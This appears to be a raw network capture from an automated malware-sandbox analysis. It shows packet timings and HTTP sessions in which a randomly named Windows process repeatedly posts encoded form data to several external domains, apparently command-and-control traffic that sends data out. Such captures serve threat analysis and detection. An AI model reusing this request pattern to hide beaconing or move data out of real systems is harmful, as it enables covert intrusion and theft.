                                                  Jul 2, 2024 14:07:36.996526003 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.997064114 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:36.997128010 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:37.004695892 CEST4974980192.168.2.4172.67.200.242
                                                  Jul 2, 2024 14:07:37.009490967 CEST8049749172.67.200.242192.168.2.4
                                                  Jul 2, 2024 14:07:42.053607941 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.058340073 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.058397055 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.060544014 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:42.065319061 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956278086 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956625938 CEST8049750188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:42.956685066 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:43.569757938 CEST4975080192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.588247061 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.594861984 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:44.594933033 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.596745014 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:44.601577044 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:45.270081043 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:45.270565033 CEST8049751188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:45.270927906 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:46.100934982 CEST4975180192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:47.118856907 CEST4975280192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:47.124253035 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.125089884 CEST4975280192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:47.126827955 CEST4975280192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:47.131684065 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131699085 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131774902 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131822109 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131872892 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131881952 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131923914 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131934881 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.131968975 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.795835018 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.796515942 CEST8049752188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:47.796576023 CEST4975280192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:48.632191896 CEST4975280192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:49.670897007 CEST4975380192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:49.678090096 CEST8049753188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:49.682889938 CEST4975380192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:49.702878952 CEST4975380192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:49.707742929 CEST8049753188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:50.340125084 CEST8049753188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:50.341204882 CEST8049753188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:50.341247082 CEST4975380192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:50.344999075 CEST4975380192.168.2.4188.114.97.3
                                                  Jul 2, 2024 14:07:50.349765062 CEST8049753188.114.97.3192.168.2.4
                                                  Jul 2, 2024 14:07:55.729104996 CEST4975480192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:55.734025955 CEST8049754116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:07:55.734221935 CEST4975480192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:55.738869905 CEST4975480192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:55.744576931 CEST8049754116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:07:57.242867947 CEST4975480192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:57.297728062 CEST8049754116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:07:59.515487909 CEST4975580192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:59.520390987 CEST8049755116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:07:59.520456076 CEST4975580192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:59.523619890 CEST4975580192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:07:59.528563976 CEST8049755116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:01.038419962 CEST4975580192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:01.086437941 CEST8049755116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.208278894 CEST4975680192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:02.213370085 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.218868017 CEST4975680192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:02.316864967 CEST4975680192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:02.321883917 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.321907043 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.321913004 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.321923018 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.322050095 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.322083950 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.322088003 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.322098017 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:02.322101116 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:03.835249901 CEST4975680192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:03.886286974 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:04.854854107 CEST4975780192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:04.859724045 CEST8049757116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:04.859853029 CEST4975780192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:04.861583948 CEST4975780192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:04.866357088 CEST8049757116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:17.104105949 CEST8049754116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:17.108962059 CEST4975480192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:20.898855925 CEST8049755116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:20.898912907 CEST4975580192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:23.610956907 CEST8049756116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:23.615053892 CEST4975680192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:26.248096943 CEST8049757116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:26.248224020 CEST4975780192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:26.249105930 CEST4975780192.168.2.4116.213.43.190
                                                  Jul 2, 2024 14:08:26.254509926 CEST8049757116.213.43.190192.168.2.4
                                                  Jul 2, 2024 14:08:31.332031965 CEST4975880192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:31.339792013 CEST8049758109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:31.344521999 CEST4975880192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:31.344521999 CEST4975880192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:31.352643013 CEST8049758109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:32.013422012 CEST8049758109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:32.015676975 CEST8049758109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:32.021085978 CEST4975880192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:32.850841045 CEST4975880192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:33.870899916 CEST4975980192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:33.876045942 CEST8049759109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:33.879148960 CEST4975980192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:33.882411003 CEST4975980192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:33.887307882 CEST8049759109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:34.557420969 CEST8049759109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:34.557445049 CEST8049759109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:34.557507992 CEST4975980192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:35.442037106 CEST4975980192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:36.448898077 CEST4976080192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:36.465801954 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.465877056 CEST4976080192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:36.473138094 CEST4976080192.168.2.4109.95.158.127
                                                  Jul 2, 2024 14:08:36.477943897 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.477981091 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478059053 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478066921 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478132010 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478148937 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478180885 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478252888 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:08:36.478266954 CEST8049760109.95.158.127192.168.2.4
                                                  Jul 2, 2024 14:09:54.261593103 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:55.116532087 CEST4977680192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.142801046 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.147809029 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.154140949 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.161942005 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.166784048 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790225029 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790425062 CEST804977746.30.211.38192.168.2.4
                                                  Jul 2, 2024 14:09:56.790477037 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.816683054 CEST4977780192.168.2.446.30.211.38
                                                  Jul 2, 2024 14:09:56.821600914 CEST804977746.30.211.38192.168.2.4
                                                  Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49736 | Destination IP: 84.32.84.112 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:06:46.303030968 CEST | 507 | OUT | GET /y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.kosherphonestore.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:06:46.773809910 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                  Server: hcdn
                                                  Date: Tue, 02 Jul 2024 12:06:46 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 795
                                                  Connection: close
                                                  location: https://www.kosherphonestore.com/y0az/?wd98XJp=1StTTN5BD+5aXW5ltMxXpzm1HVVSwZLsUdxETJpeMbRSKeJkL8yNVC6cqVCEcPMcPzsub+RoFiososJ7aYXNlWIy6nA9AoQ6GnR0Gmd+weA/r+qlKoAho/M=&2hZdq=H6f4R
                                                  platform: hostinger
                                                  content-security-policy: upgrade-insecure-requests
                                                  alt-svc: h3=":443"; ma=86400
                                                  x-hcdn-request-id: e36698108510dbb971e6cba6148b6750-bos-edge3
                                                  x-hcdn-cache-status: MISS
                                                  x-hcdn-upstream-rt: 0.001
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20p
                                                  Jul 2, 2024 14:06:46.773828983 CEST | 120 | IN |
                                                  Data Ascii: x;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                  Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49738 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:01.922969103 CEST | 765 | OUT | POST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=l+Zm56JlkSTBVJv0V6KkAOKOiiaNUj7vz1u3OeIaWPqHF/ig/E0vRLLNwkK4kxxnV65aS8Yvngpv3n7oHSEy88N/otTjAEM7G/o43MHqVZJ2k8aJgR+J7C8RulrC6VNst/u3QpTigBqaQCF9Ufgi6UQ1+/49cY57CL8G3fQbojsQmedpzGzamnR7tQ44qSWYIg==


                                                  Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49739 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:04.478291988 CEST | 785 | OUT | POST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=l+Zm56JlkSTBVp/0SZSkIOKPvyaNCT6Hz1y3Ob4KW6yHFd6gtF0vWLLN7EKx5hxoV9x0S9Ivng9v3nLoHhc98sN58dThNkM7G/o43NjEVZB2nMKJh0KK4C8SplrCrFNgt/uVQrncgEuaQC19arUt1UQsxf5pN6coMYcK5Y4qgTd2u4Mzi3SN0n1IwXxMnRrRToRtFeHvub9rfixdAjPDH3k=


                                                  Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49740 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:07.017208099 CEST | 10867 | OUT | POST /sm5e/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.abc8web.com
                                                  Origin: http://www.abc8web.com
                                                  Referer: http://www.abc8web.com/sm5e/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]


                                                  Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:09.547482014 CEST | 498 | OUT | GET /sm5e/?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Host: www.abc8web.com
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Jul 2, 2024 14:07:10.032242060 CEST | 395 | IN | HTTP/1.1 200 OK
                                                  Server: openresty
                                                  Date: Tue, 02 Jul 2024 12:07:09 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 255
                                                  Connection: close
                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?wd98XJp=o8xG6LBLqhGEFqfWTr3vbfLymD68CBTmrGDPPbcweY6zCsuE8W4/fbHpwlO8ph1RffMeX91soDhoi1OdGkM065Zd4OviC0ZoCrIQ2N2wQupqguS4lzCfvC0=&2hZdq=H6f4R"}</script></head></html>


                                                  Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 78.111.111.51 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:15.236401081 CEST | 783 | OUT | POST /ecb1/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.threendresses.com
                                                  Origin: http://www.threendresses.com
                                                  Referer: http://www.threendresses.com/ecb1/
                                                  Connection: close
                                                  Content-Length: 204
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=v3jzWGEcFLlLzqKd0Lwdw6sfbgA83hSNJX3kpNs1CC5VLggZd4zoXdtP9LdysgAv6fxXPajeXzRLlpaIhADqb8DggQ8rDtLHX38pVrS6Mz9deUYnzY3/xb1Ha/bVEMQEEL6bVmrCApPRnNuxl5vKsDy2+cm5VrkMQcaCecLZRWQjgBI71BvFhnObMXUbUsRndw==
                                                  Jul 2, 2024 14:07:15.971025944 CEST | 1103 | IN | HTTP/1.1 301 Moved Permanently
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 795
                                                  date: Tue, 02 Jul 2024 12:07:14 GMT
                                                  location: https://www.threendresses.com/ecb1/
                                                  x-xss-protection: 1; mode=block
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  referrer-policy: same-origin
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                  Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 78.111.111.51 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:17.766593933 CEST | 803 | OUT | POST /ecb1/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.threendresses.com
                                                  Origin: http://www.threendresses.com
                                                  Referer: http://www.threendresses.com/ecb1/
                                                  Connection: close
                                                  Content-Length: 224
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp=v3jzWGEcFLlLxK6d2qwdnKscFwA85BSJJX7kpM4lCwNVLFEZc5zoUdtP2rdzxwAe6f91PbfeXzFLls+Ih33rJcDu1A8pc9LHX38pVrHRMzldeBQny534q71GZ/bVAMQIEL69VlvsAq3RnN+xlsbJlDyww8nmULl5JOTXTtW5cSQglHZhkwOSznqoRQdvZvsuGyH8d9NYxiHuPjCqCIrX47I=
                                                  Jul 2, 2024 14:07:18.480823040 CEST | 1103 | IN | HTTP/1.1 301 Moved Permanently
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 795
                                                  date: Tue, 02 Jul 2024 12:07:17 GMT
                                                  location: https://www.threendresses.com/ecb1/
                                                  x-xss-protection: 1; mode=block
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  referrer-policy: same-origin
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                  Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 78.111.111.51 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:20.301001072 CEST | 10885 | OUT | POST /ecb1/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.threendresses.com
                                                  Origin: http://www.threendresses.com
                                                  Referer: http://www.threendresses.com/ecb1/
                                                  Connection: close
                                                  Content-Length: 10304
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Cache-Control: max-age=0
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                  Data Ascii: wd98XJp= [TRUNCATED]
                                                  Jul 2, 2024 14:07:21.084012985 CEST | 1103 | IN | HTTP/1.1 301 Moved Permanently
                                                  Connection: close
                                                  content-type: text/html
                                                  content-length: 795
                                                  date: Tue, 02 Jul 2024 12:07:19 GMT
                                                  location: https://www.threendresses.com/ecb1/
                                                  x-xss-protection: 1; mode=block
                                                  x-frame-options: SAMEORIGIN
                                                  x-content-type-options: nosniff
                                                  referrer-policy: same-origin
                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                  Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 78.111.111.51 | Destination Port: 80 | PID: 1364
                                                  Process: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Jul 2, 2024 14:07:22.830857038 CEST | 504 | OUT | GET /ecb1/?wd98XJp=i1LTV2o1IZtmrbvE4asAhp8fTTMl8iuKZlDswLcPFQRrGDQpSYT4T6Qz9Nxrj1c/x943R5zeBwNAiK6gnAeQLZ/WlxRJaqzCSDsHaoXTEmVBFAAd8oj/2Yo=&2hZdq=H6f4R HTTP/1.1
